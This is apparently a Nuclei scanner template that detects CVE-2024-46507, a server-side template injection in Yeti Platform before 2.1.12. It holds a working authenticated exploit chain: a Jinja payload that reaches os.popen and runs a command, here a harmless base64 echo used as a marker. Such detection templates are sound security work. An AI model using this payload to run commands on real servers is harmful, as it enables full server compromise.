id: CVE-2024-46507 info: name: Yeti Platform < 2.1.12 - Server-Side Template Injection to RCE author: iamnoooob,rootxharsh,pdresearch severity: high description: | The Yeti Platform < 2.1.12 contains a Server-Side Template Injection (SSTI) vulnerability that can lead to Remote Code Execution (RCE) when exploited by an authenticated user. Attackers with valid credentials can inject malicious template expressions, which the server evaluates, allowing arbitrary command execution. impact: | Successful exploitation enables an attacker to execute arbitrary system commands, potentially leading to full server compromise. remediation: | Upgrade to Yeti Platform 2.1.12 or later to mitigate this vulnerability. reference: - https://rhinosecuritylabs.com/research/cve-2024-46507-yeti-server-side-template-injection-ssti/ metadata: shodan-query: html:"Yeti" verified: true max-request: 4 tags: cve,cve2024,yeti,platform,ssti,rce,intrusive,vkev,vuln variables: username: "{{username}}" password: "{{password}}" http: - raw: - | POST /api/v2/auth/token HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryodI9qNm7xBZLCq9n ------WebKitFormBoundaryodI9qNm7xBZLCq9n Content-Disposition: form-data; name="username" {{username}} ------WebKitFormBoundaryodI9qNm7xBZLCq9n Content-Disposition: form-data; name="password" {{password}} ------WebKitFormBoundaryodI9qNm7xBZLCq9n-- matchers: - type: word part: body words: - access_token internal: true - raw: - | POST /api/v2/templates/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"template":{"name":"AA","template":"value,tags\n{% for obj in data %}{{obj.value}},{{\";\".join(obj.tags.keys())}}\n{% endfor %}\n\n{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(\"echo Q1ZFLTIwMjQtNDY1MDcK | base64 -d\").read()}}{%endif%}{% endfor %}"}} skip-variables-check: true extractors: - type: json part: body name: template_id json: - '.id' internal: true - raw: - | POST /api/v2/observables/extended HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"observable":{"type":"ipv4","value":"1.{{randint(1,255)}}.{{randint(1,255)}}.{{randint(1,255)}}"}} extractors: - type: json part: body name: observable_id json: - '.id' internal: true - raw: - | POST /api/v2/templates/render HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"template_id":"{{template_id}}","observable_ids":["{{observable_id}}"],"search_query":""} matchers: - type: dsl dsl: - 'contains(body, "CVE-2024-46507")' - 'contains(content_type, "text/plain")' - 'status_code == 200' condition: and # digest: 4b0a00483046022100afcd8e88115f2293b3d51fe4981a444d16ebeae84e9f6feea5d5762c9358e5b6022100fb41cf1c6f661a7f4523d249a0ded7cb0678afb79c8a93154a1261f866ad230a:922c64590222798bb761d5b6d8e72950